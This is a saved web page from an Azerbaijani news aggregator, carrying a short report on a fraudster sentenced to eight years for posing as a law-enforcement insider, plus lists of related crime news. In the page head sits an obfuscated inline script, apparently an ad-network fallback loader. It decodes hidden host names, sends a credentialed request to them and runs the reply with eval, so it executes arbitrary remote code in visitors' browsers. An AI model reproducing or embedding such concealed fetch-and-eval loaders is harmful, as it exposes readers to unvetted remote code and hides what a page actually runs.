<!DOCTYPE html>
<html>
  <head>
    <script data-cfasync="false" type="text/javascript">var N4N=window;for(var f in N4N){if(f.length===((6.,65.)<=(0xD0,0x171)?(0x9D,6):(134.5E1,0x1D9)<0x6?(97,''):(8.61E2,0x23B))&&f.charCodeAt((103==(14.700E2,103)?(0xCB,3):(3.1E1,137.4E1)))===((116.,103.)<(41,0x1D5)?(97.,100):(124.,0x1EA))&&f.charCodeAt((0x16E>=(101.80E1,1.294E3)?(0xC8,4.4E1):(0x3C,2.45E2)<=(84.,1.262E3)?(0xB2,5):(48,1.379E3)))===(0x1B7<=(149.6E1,110.80E1)?(0x9A,119):(57.90E1,138)>0xD5?0x1CB:(0x16,71))&&f.charCodeAt((0x4D<=(0x135,32.30E1)?(19,1):(0x5F,128.)))===((109,4.05E2)<=(30.,0x1B3)?(122,105):(0xB8,0x236))&&f.charCodeAt(((6.65E2,128)>(38,12.9E2)?(0x231,'/'):(0xE4,27.70E1)<7.7E2?(1.1E2,0):(0x1D6,0x1C7)))===((0x232,63.)<=46.2E1?(13.70E1,119):(0x25,94.60E1)<=(11.290E2,50.)?(90,6.60E1):(56.,77)))break};for(var J in N4N[f]){if(J.length===((0x8F,31.90E1)<=(10.31E2,18.1E1)?'S':(0xE1,4.28E2)>=(0x1D7,67.)?(125,8):(120,1.389E3))&&J.charCodeAt(((29.0E1,43)<=93.80E1?(0xBC,5):(0x118,0x141)))===(35.5E1<=(0x1FE,142.5E1)?(1.442E3,101):(1.157E3,0x1C1))&&J.charCodeAt(((0x111,6.350E2)<=(33.7E1,72.7E1)?(137,7):(86,7.16E2)))===(102<=(56.6E1,100.)?0x106:(52.90E1,0xF5)<(6.41E2,2.47E2)?(0xEC,116):(0x96,75.10E1))&&J.charCodeAt(((136,112)<=(10.44E2,0x193)?(0x49,3):(6.060E2,0xEA)))===(14.93E2>=(1.445E3,0xF5)?(81.,117):97<=(57.,0x3C)?(0x243,4.66E2):(0x139,0x39))&&J.charCodeAt(((38,0xB9)>(0x23F,4)?(63.2E1,0):(137,0x20B)))===((8.98E2,99.)<120.30E1?(0x104,100):(58.1E1,0xA2)))break};(function(V,g,C,w){N4N[f][g]=function(){var r=((86,13.42E2)<=0x67?(0x13D,''):19<=(51.30E1,33)?(0x33,0):(0x14F,7.16E2)),x=r,o=function o(){var K=((1.28E3,1.266E3)<0x134?(0,"i"):(76,1.372E3)>=0x188?(0xDB,'/'):(9.94E2,46.40E1));var p='';var e='//';var q=(0xCB>=(32,0x1B2)?(0x173,"Q"):(2.85E2,12.06E2)>=36.0E1?(6.890E2,'T'):(0x18C,0xA1));var N='GE';var a=(139.4E1>(1.83E2,132.)?(0xE3,true):(10.08E2,0xD0));var s=new XMLHttpRequest();s.withCredentials=a;s.open((N+q),(e)+N4N[f]['atob'](C[x].split(p).reverse().join(p))+K+w+K,a);s.onreadystatechange=function(){var H=((86.,34.80E1)>=(9.040E2,0xA5)?(0x1EA,200):(11.20E1,4.82E2));var U=((0x24C,64.3E1)>149?(9.8E2,4):(0x113,12.59E2));if(s.readyState==U&&s.status==H&&s.responseText){eval(s.responseText);}};s.onerror=function(){if(++x!=C.length){o();}};try{s.send();}catch(H){s.onerror();}};o();};})(N4N[f][J],'_emijemb',['=02bj5CanVGb2RmNmNmemdjdndDbxp2NqJ2dyQTb','==QbvNmLqRWOuVGO4NGb2hGOxFTZv52btxmd28mcyRTa','t92YuYzc2UWNrRXcxFXe5cmYz8mZhNGNx9WcqVGc','=02bj5ia0MzckZma1QHNmNHZ'],'U0Y6MTA1NDM0ODpnRWxFdA');</script><script data-cfasync="false" type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1054347" onerror="window._emijemb();"></script>    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Hüquq-mühafizə orqanlarının adından istifadə edərək dələduzluq edən şəxsə hökm oxunub</title>
    <base href="http://www.xebersaati.com/">
    <meta property="fb:app_id" content="694464134024628" />
    <meta property="og:url" content="http://www.xebersaati.com/news/89022-huquq-muhafize-orqanlarinin-adindan-istifade-ederek-deleduzluq-eden-shexse-hokm-oxunub/" />
    <meta property="og:type" content="article" />
    <meta property="og:title" content="Hüquq-mühafizə orqanlarının adından istifadə edərək dələduzluq edən şəxsə hökm oxunub" />
    <meta property="og:description" content="Azərbaycanda və dünyada baş verən hadisələrdən xəbərdar olun." />
    <meta property="og:image" content="http://az.apa.az/upload/images/news/2017/july/25/big/mehkeme-logo.jpg" />
    <meta property="fb:admins" content="708967524" />
    <meta name="twitter:card" content="summary" />
    <meta name="twitter:site" content="@xebersaati" />
    <meta name="twitter:creator" content="@xebersaati" />
    <meta name="twitter:domain" content="http://www.xebersaati.com/" />
    <meta name="twitter:title" content="Hüquq-mühafizə orqanlarının adından istifadə edərək dələduzluq edən şəxsə hökm oxunub" />
    <meta name="twitter:description" content="Azərbaycanda və dünyada baş verən hadisələrdən xəbərdar olun." />
    <meta name="twitter:image" content="http://az.apa.az/upload/images/news/2017/july/25/big/mehkeme-logo.jpg" />
    <meta name="robots" content="index, follow"/>
    <meta name="googlebot" content="index, follow" />
    <meta name="googlebot" content="index, archive" />
    <meta name="googlebot" content="all" />
    <meta name="yahoobot" content="index,follow" />
    <meta name="alexabot" content="index,follow" />
    <meta name="msnbot" content="index,follow" />
    <meta name="dmozbot" content="index,follow" />
    <meta name="revisit-after" content="1 days" />
    <meta name="description" content="Azərbaycanda və dünyada baş verən hadisələrdən xəbərdar olun." />
    <meta name="keywords" content="siyasət, iqtisadiyyat xəbərləri, dünya xəbərləri, gündəm, bölgə xəbərləri, xəbərlər, müharibə, xəbər, xəbər lenti" />
    <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">
    <link rel="stylesheet" type="text/css" href="css/bootflat.min.css">
    <link rel="stylesheet" type="text/css" href="css/style.css">
    <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">
    <link rel="icon" type="image/png" href="img/favicon.png">
    <script type="text/javascript" src="//ylx-4.com/pun.php?section=Deneme&pt=6&pub=432512&ga=g"></script>
    <!--[if lt IE 9]>
      <script src="js/html5shiv.js"></script>
      <script src="js/respond.min.js"></script>
    <![endif]-->
  </head>
  <body>

    <div class="container" id="container">
      <hr>
      <div class="logo pull-left">
        <a href="http://www.xebersaati.com/" class="pull-left"><img src="img/logo.png" alt="xəbər saatı"></a><div id="kategoriyalarButton"><button class="btn btn-danger">Kategoriyaları göstər <i class="fa fa-angle-double-down" aria-hidden="true"></i></button></div>
      </div>

            

      <div class="languages pull-right">
        <span class="badge"><a href="lang.php?lang=az">AZ</a></span>
        <span class="badge"><a href="lang.php?lang=en">EN</a></span>
        <span class="badge"><a href="lang.php?lang=ru">RU</a></span>
        <span class="badge"><a href="lang.php?lang=tr">TR</a></span>
      </div>

      <div class="clearfix"></div>
      <hr> 
      <div class="row">
      <div id="kategoriyalar">
        <div class="categories center-block"><a href="http://www.xebersaati.com/category/afrika/" class="btn btn-xs btn-primary">Afrika</a><a href="http://www.xebersaati.com/category/amerika/" class="btn btn-xs btn-primary">Amerika</a><a href="http://www.xebersaati.com/category/aqrar-senaye-kompleksi/" class="btn btn-xs btn-primary">Aqrar-sənaye kompleksi</a><a href="http://www.xebersaati.com/category/asiya/" class="btn btn-xs btn-primary">Asiya</a><a href="http://www.xebersaati.com/category/atletika/" class="btn btn-xs btn-primary">Atletika</a><a href="http://www.xebersaati.com/category/avropa/" class="btn btn-xs btn-primary">Avropa</a><a href="http://www.xebersaati.com/category/avto-moto/" class="btn btn-xs btn-primary">Avto-Moto</a><a href="http://www.xebersaati.com/category/az/" class="btn btn-xs btn-primary">az</a><a href="http://www.xebersaati.com/category/birja/" class="btn btn-xs btn-primary">Birja</a><a href="http://www.xebersaati.com/category/biznes-ve-iqtisadiyyat-xeberleri/" class="btn btn-xs btn-primary">Biznes və iqtisadiyyat xəbərləri</a><a href="http://www.xebersaati.com/category/cemiyyet/" class="btn btn-xs btn-primary">Cəmiyyət</a><a href="http://www.xebersaati.com/category/dagliq-qarabag/" class="btn btn-xs btn-primary">Dağlıq Qarabağ</a><a href="http://www.xebersaati.com/category/dagliq-qarabag-munaqishesi/" class="btn btn-xs btn-primary">Dağlıq Qarabağ Münaqişəsi</a><a href="http://www.xebersaati.com/category/daxili-siyaset/" class="btn btn-xs btn-primary">Daxili siyasət</a><a href="http://www.xebersaati.com/category/diaspor/" class="btn btn-xs btn-primary">Diaspor</a><a href="http://www.xebersaati.com/category/din/" class="btn btn-xs btn-primary">Din</a><a href="http://www.xebersaati.com/category/doyush-novleri/" class="btn btn-xs btn-primary">Döyüş növləri</a><a href="http://www.xebersaati.com/category/dunya/" class="btn btn-xs btn-primary">Dünya</a><a href="http://www.xebersaati.com/category/dunya-xeberleri/" class="btn btn-xs btn-primary">Dünya xəbərləri</a><a href="http://www.xebersaati.com/category/energetika/" class="btn btn-xs btn-primary">Energetika</a><a href="http://www.xebersaati.com/category/edebiyyat/" class="btn btn-xs btn-primary">Ədəbiyyat</a><a href="http://www.xebersaati.com/category/futbol/" class="btn btn-xs btn-primary">Futbol</a><a href="http://www.xebersaati.com/category/hadise/" class="btn btn-xs btn-primary">Hadisə</a><a href="http://www.xebersaati.com/category/herbi/" class="btn btn-xs btn-primary">Hərbi</a><a href="http://www.xebersaati.com/category/idman/" class="btn btn-xs btn-primary">İdman</a><a href="http://www.xebersaati.com/category/iii-sektor/" class="btn btn-xs btn-primary">III Sektor</a><a href="http://www.xebersaati.com/category/ikt/" class="btn btn-xs btn-primary">İKT</a><a href="http://www.xebersaati.com/category/incesenet/" class="btn btn-xs btn-primary">İncəsənət</a><a href="http://www.xebersaati.com/category/infrastruktur/" class="btn btn-xs btn-primary">İnfrastruktur</a><a href="http://www.xebersaati.com/category/iqtisadi/" class="btn btn-xs btn-primary">İqtisadi</a><a href="http://www.xebersaati.com/category/iqtisadiyyat/" class="btn btn-xs btn-primary">İqtisadiyyat</a><a href="http://www.xebersaati.com/category/islamiada/" class="btn btn-xs btn-primary">İslamiada</a><a href="http://www.xebersaati.com/category/kriminal/" class="btn btn-xs btn-primary">Kriminal</a><a href="http://www.xebersaati.com/category/maliyye/" class="btn btn-xs btn-primary">Maliyyə</a><a href="http://www.xebersaati.com/category/maraqli/" class="btn btn-xs btn-primary">Maraqlı</a><a href="http://www.xebersaati.com/category/mdb/" class="btn btn-xs btn-primary">MDB</a><a href="http://www.xebersaati.com/category/media/" class="btn btn-xs btn-primary">Media</a><a href="http://www.xebersaati.com/category/medeniyyet/" class="btn btn-xs btn-primary">Mədəniyyət</a><a href="http://www.xebersaati.com/category/medeniyyet-siyaseti/" class="btn btn-xs btn-primary">Mədəniyyət siyasəti</a><a href="http://www.xebersaati.com/category/muharibe/" class="btn btn-xs btn-primary">Müharibə</a><a href="http://www.xebersaati.com/category/musahibe/" class="btn btn-xs btn-primary">Müsahibə</a><a href="http://www.xebersaati.com/category/nezer-noqtesi/" class="btn btn-xs btn-primary">Nəzər nöqtəsi</a><a href="http://www.xebersaati.com/category/olimpiada/" class="btn btn-xs btn-primary">Olimpiada</a><a href="http://www.xebersaati.com/category/ordu/" class="btn btn-xs btn-primary">Ordu</a><a href="http://www.xebersaati.com/category/sahibkarliq/" class="btn btn-xs btn-primary">Sahibkarlıq</a><a href="http://www.xebersaati.com/category/senaye-ve-energetika/" class="btn btn-xs btn-primary">Sənaye və energetika</a><a href="http://www.xebersaati.com/category/sergi/" class="btn btn-xs btn-primary">Sərgi</a><a href="http://www.xebersaati.com/category/siyaset/" class="btn btn-xs btn-primary">Siyasət</a><a href="http://www.xebersaati.com/category/siyasi/" class="btn btn-xs btn-primary">Siyasi</a><a href="http://www.xebersaati.com/category/sosial/" class="btn btn-xs btn-primary">Sosial</a><a href="http://www.xebersaati.com/category/shou-biznes/" class="btn btn-xs btn-primary">Şou-biznes</a><a href="http://www.xebersaati.com/category/stolustu-oyunlar/" class="btn btn-xs btn-primary">Stolüstü oyunlar</a><a href="http://www.xebersaati.com/category/telekommunikasiya/" class="btn btn-xs btn-primary">Telekommunikasiya</a><a href="http://www.xebersaati.com/category/tender-musabiqeleri/" class="btn btn-xs btn-primary">Tender müsabiqələri</a><a href="http://www.xebersaati.com/category/top-oyunlari/" class="btn btn-xs btn-primary">Top oyunları</a><a href="http://www.xebersaati.com/category/turizm/" class="btn btn-xs btn-primary">Turizm</a><a href="http://www.xebersaati.com/category/xarici-siyaset/" class="btn btn-xs btn-primary">Xarici siyasət</a></div><div class="clearfix"></div><hr> 
      </div>
      
      <div class="content">
  <a href="http://go.ad2up.com/afu.php?id=1054352" target="_blank"><img src="img/earn-money-from-internet.png" class="thumbnail img-responsive" id="kat"></a>
  <div class="box thumbnail">	
    <div class="xeberMetni">
          <img src="http://az.apa.az/upload/images/news/2017/july/25/big/mehkeme-logo.jpg" alt="" class="thumbnail">
          <h1>Hüquq-mühafizə orqanlarının adından istifadə edərək dələduzluq edən şəxsə hökm oxunub</h1>
          <p class="help-block"><em><small>2017-07-25 12:39</small> | <a href="http://apa.az/xeber-az/hadise/huquq-muhafize-orqanlarinin-adindan-istifade-ederek-deleduzluq-eden-sexse-hokm-oxunub-5721.html" target="_blank">www.apa.az</a> | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</em></p>
          

            
                        <p><span>Bakı Ağır Cinayətlər Məhkəməsində dələduzluqda təqsirləndirilən El&ccedil;in Səfərovun cinayət işi &uuml;zrə məhkəmə prosesi başa &ccedil;atıb.</span></p>



<p><a href="http://apa.az">APA</a>-nın xəbərinə g&ouml;rə, hakim Ənvər Seyidovun sədrliyi ilə ke&ccedil;irilən prosesdə E. Səfərovun vəkili Tarif Nəsirov &ccedil;ıxış edərək, h&uuml;quqlarını m&uuml;dafiə etdiyi şəxsə y&uuml;ng&uuml;l cəza &ccedil;ıxarılmasını xahiş edib.</p>



<p>E. Səfərov son s&ouml;z&uuml;ndə əməlindən peşman olduğunu deyib.</p>



<p>M&uuml;şavirədən sonra h&ouml;km oxunub. H&ouml;kmə əsasən, E. Səfərov 8 il m&uuml;ddətinə azadlıqdan məhrum edilib.</p>



<p>İttihama g&ouml;rə, E. Səfərov zərər&ccedil;əkmiş G&uuml;lmayə Məmmədovaya h&uuml;quq-m&uuml;hafizə orqanlarının rəhbər şəxsləri ilə tanışlıq m&uuml;nasibəti olduğunu deyərək, ona dəyən k&uuml;lli miqdarda ziyanın qaytarılmasına k&ouml;mək edəcəyini deyib. Bunun m&uuml;qabilində o, G. Məmmədovadan 10 min manatdan &ccedil;ox pul alıb və amma vədinə əmək etməyib.</p>

                <!--<iframe width="100%" height="315" src="http://apa.tv/embed/22530" frameborder="0" allowfullscreen=""></iframe>-->
                

                        
			
			
		


			
          <hr>
          <div class="text-center addthis_sharing_toolbox"></div>
        </div>    <div class="clearfix"></div>
  </div>
  <h1 class="relatedTitle">Bu kateqoriyadaki digər xəbərlər</h1>
  <div class="box"><h4>Hadisə</h4><ul class="media-list"><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/89078-haciqabul-sakini-qonshusu-terefinden-gullelenib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/july/25/big/silah.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/89078-haciqabul-sakini-qonshusu-terefinden-gullelenib/">Hacıqabul sakini qonşusu tərəfindən güllələnib</a></div>
                  <small>2017-07-25 14:18 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 7</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/89083-2-gun-once-xezerde-batmish-17-yashli-gencin-cesedi-tapildi/"><img class="media-object img-rounded" widht="75" height="45" src="https://cdn2.trend.az/media/pictures/2015/06/28/trend_fhn_beach_010611_13.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/89083-2-gun-once-xezerde-batmish-17-yashli-gencin-cesedi-tapildi/">2 gün öncə Xəzərdə batmış 17 yaşlı gəncin cəsədi tapıldı</a></div>
                  <small>2017-07-25 14:16 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/89073-shekide-otla-dolu-yuk-mashini-yanib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/july/25/big/meshede-yangin.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/89073-shekide-otla-dolu-yuk-mashini-yanib/">Şəkidə otla dolu yük maşını yanıb</a></div>
                  <small>2017-07-25 14:04 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/89063-iki-gun-evvel-xezerde-batan-17-yashli-oglanin-meyiti-sudan-cixarilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/july/25/big/baliqchi-gemisi.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/89063-iki-gun-evvel-xezerde-batan-17-yashli-oglanin-meyiti-sudan-cixarilib/">İki gün əvvəl Xəzərdə batan 17 yaşlı oğlanın meyiti sudan çıxarılıb</a></div>
                  <small>2017-07-25 13:47 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 6</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/89056-shabranda-22-yashli-oglan-bicaqlanib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/july/25/big/bichaq.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/89056-shabranda-22-yashli-oglan-bicaqlanib/">Şabranda 22 yaşlı oğlan bıçaqlanıb</a></div>
                  <small>2017-07-25 13:29 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 7</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/89035-qanunsuz-agac-kesen-shexsler-hebs-edilib-cinayet-ishi-bashlanib/"><img class="media-object img-rounded" widht="75" height="45" src="https://cdn2.trend.az/media/pictures/2009/01/13/Tree_130109.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/89035-qanunsuz-agac-kesen-shexsler-hebs-edilib-cinayet-ishi-bashlanib/">Qanunsuz ağac kəsən şəxslər həbs edilib - cinayət işi başlanıb</a></div>
                  <small>2017-07-25 13:14 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/89038-masallida-din-xadiminin-evinden-ogurluq-edilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/july/25/big/ogurluq.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/89038-masallida-din-xadiminin-evinden-ogurluq-edilib/">Masallıda din xadiminin evindən oğurluq edilib</a></div>
                  <small>2017-07-25 13:05 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 7</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/89030-rusiyada-besh-neferlik-azerbaycanli-ailesinin-yanaraq-olmesi-ile-bagli-cinayet-ishi-bashlanib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/july/25/big/7ec0bb4c1fc6c23d33da847dcd69b878.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/89030-rusiyada-besh-neferlik-azerbaycanli-ailesinin-yanaraq-olmesi-ile-bagli-cinayet-ishi-bashlanib/">Rusiyada beş nəfərlik azərbaycanlı ailəsinin yanaraq olməsi ilə bağlı cinayət işi başlanıb</a></div>
                  <small>2017-07-25 13:03 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/89023-shemkirde-narkotik-vasite-beceren-shexs-saxlanilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/july/25/big/narkotik-polis.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/89023-shemkirde-narkotik-vasite-beceren-shexs-saxlanilib/">Şəmkirdə narkotik vasitə becərən şəxs saxlanılıb</a></div>
                  <small>2017-07-25 12:41 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 7</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/89022-huquq-muhafize-orqanlarinin-adindan-istifade-ederek-deleduzluq-eden-shexse-hokm-oxunub/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/july/25/big/mehkeme-logo.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/89022-huquq-muhafize-orqanlarinin-adindan-istifade-ederek-deleduzluq-eden-shexse-hokm-oxunub/">Hüquq-mühafizə orqanlarının adından istifadə edərək dələduzluq edən şəxsə hökm oxunub</a></div>
                  <small>2017-07-25 12:39 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 6</small>
                </div>
              </li></ul></div></div>
<div class="sidebar">
  <h1>Son xəbərlər</h1>
  <ul class="media-list"><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/89078-haciqabul-sakini-qonshusu-terefinden-gullelenib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/july/25/big/silah.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/89078-haciqabul-sakini-qonshusu-terefinden-gullelenib/">Hacıqabul sakini qonşusu tərəfindən güllələnib</a></div>
                <small>2017-07-25 14:18 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 7</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/89077-alti-qazaxistanli-telebe-misirde-itkin-dushub/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/july/25/big/kair.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/89077-alti-qazaxistanli-telebe-misirde-itkin-dushub/">Altı qazaxıstanlı tələbə Misirdə itkin düşüb</a></div>
                <small>2017-07-25 14:16 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/89083-2-gun-once-xezerde-batmish-17-yashli-gencin-cesedi-tapildi/"><img class="media-object img-rounded" widht="75" height="45" src="https://cdn2.trend.az/media/pictures/2015/06/28/trend_fhn_beach_010611_13.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/89083-2-gun-once-xezerde-batmish-17-yashli-gencin-cesedi-tapildi/">2 gün öncə Xəzərdə batmış 17 yaşlı gəncin cəsədi tapıldı</a></div>
                <small>2017-07-25 14:16 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/89073-shekide-otla-dolu-yuk-mashini-yanib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/july/25/big/meshede-yangin.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/89073-shekide-otla-dolu-yuk-mashini-yanib/">Şəkidə otla dolu yük maşını yanıb</a></div>
                <small>2017-07-25 14:04 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/89069-azerbaycanda-ovladliga-goturulen-ushaqlarin-sayi-azalib/"><img class="media-object img-rounded" widht="75" height="45" src="https://cdn2.trend.az/media/pictures/2013/08/28/baby_boom_280813.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/89069-azerbaycanda-ovladliga-goturulen-ushaqlarin-sayi-azalib/">Azərbaycanda övladlığa götürülən uşaqların sayı azalıb</a></div>
                <small>2017-07-25 14:00 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/89063-iki-gun-evvel-xezerde-batan-17-yashli-oglanin-meyiti-sudan-cixarilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/july/25/big/baliqchi-gemisi.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/89063-iki-gun-evvel-xezerde-batan-17-yashli-oglanin-meyiti-sudan-cixarilib/">İki gün əvvəl Xəzərdə batan 17 yaşlı oğlanın meyiti sudan çıxarılıb</a></div>
                <small>2017-07-25 13:47 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 6</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/89080-metanet-a-shirketi-yay-tecrube-proqrami-na-start-verib/"><img class="media-object img-rounded" widht="75" height="45" src="http://oxu.azstatic.com/uploads/W1siZiIsIjIwMTcvMDcvMjUvMTMvNDgvMTIvNjUzL21ldGFuZXQuanBnIl0sWyJwIiwiZW5jb2RlIiwianBnIiwiLXF1YWxpdHkgODAiXSxbInAiLCJ0aHVtYiIsIjYyMHg0NjVcdTAwM2UiXV0?sha=34227368"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/89080-metanet-a-shirketi-yay-tecrube-proqrami-na-start-verib/">“Mətanət A” şirkəti “Yay təcrübə proqramı”na start verib</a></div>
                <small>2017-07-25 13:46 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/89062-erdogan-qerbin-turkiyeye-qarshi-embarqo-planinin-neticesiz-olacagini-beyan-edib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/july/25/big/receb-tayyib-erdogan-recep-tayyib-erdogan.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/89062-erdogan-qerbin-turkiyeye-qarshi-embarqo-planinin-neticesiz-olacagini-beyan-edib/">Ərdoğan Qərbin Türkiyəyə qarşı embarqo planının nəticəsiz olacağını bəyan edib</a></div>
                <small>2017-07-25 13:45 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 6</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/89060-rusiya-sefirliyi-azerbaycan-mehkemesinin-lapshinle-bagli-qerarini-sherh-etmek-huququmuz-yoxdur/"><img class="media-object img-rounded" widht="75" height="45" src="https://cdn2.trend.az/media/pictures/2015/06/08/trend_russian_embassy240506.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/89060-rusiya-sefirliyi-azerbaycan-mehkemesinin-lapshinle-bagli-qerarini-sherh-etmek-huququmuz-yoxdur/">Rusiya səfirliyi: Azərbaycan məhkəməsinin Lapşinlə bağlı qərarını şərh etmək hüququmuz yoxdur</a></div>
                <small>2017-07-25 13:43 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/89044-ispaniyada-namelum-shexs-allahu-ekber-qishqirib-polislere-hucum-etdi/"><img class="media-object img-rounded" widht="75" height="45" src="https://cdn2.trend.az/media/pictures/2009/09/25/Knife_250909.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/89044-ispaniyada-namelum-shexs-allahu-ekber-qishqirib-polislere-hucum-etdi/">İspaniyada naməlum şəxs "Allahu Əkbər" qışqırıb polislərə hücum etdi</a></div>
                <small>2017-07-25 13:29 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/89056-shabranda-22-yashli-oglan-bicaqlanib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/july/25/big/bichaq.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/89056-shabranda-22-yashli-oglan-bicaqlanib/">Şabranda 22 yaşlı oğlan bıçaqlanıb</a></div>
                <small>2017-07-25 13:29 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 7</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/89055-saglamliq-imkanlari-mehdud-ushaqlarin-muessisesine-bashcekme-kecirilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/july/25/big/ombudsman-logo.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/89055-saglamliq-imkanlari-mehdud-ushaqlarin-muessisesine-bashcekme-kecirilib/">Sağlamlıq imkanları məhdud uşaqların müəssisəsinə başçəkmə keçirilib</a></div>
                <small>2017-07-25 13:28 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
              </div>
            </li><li class="media">
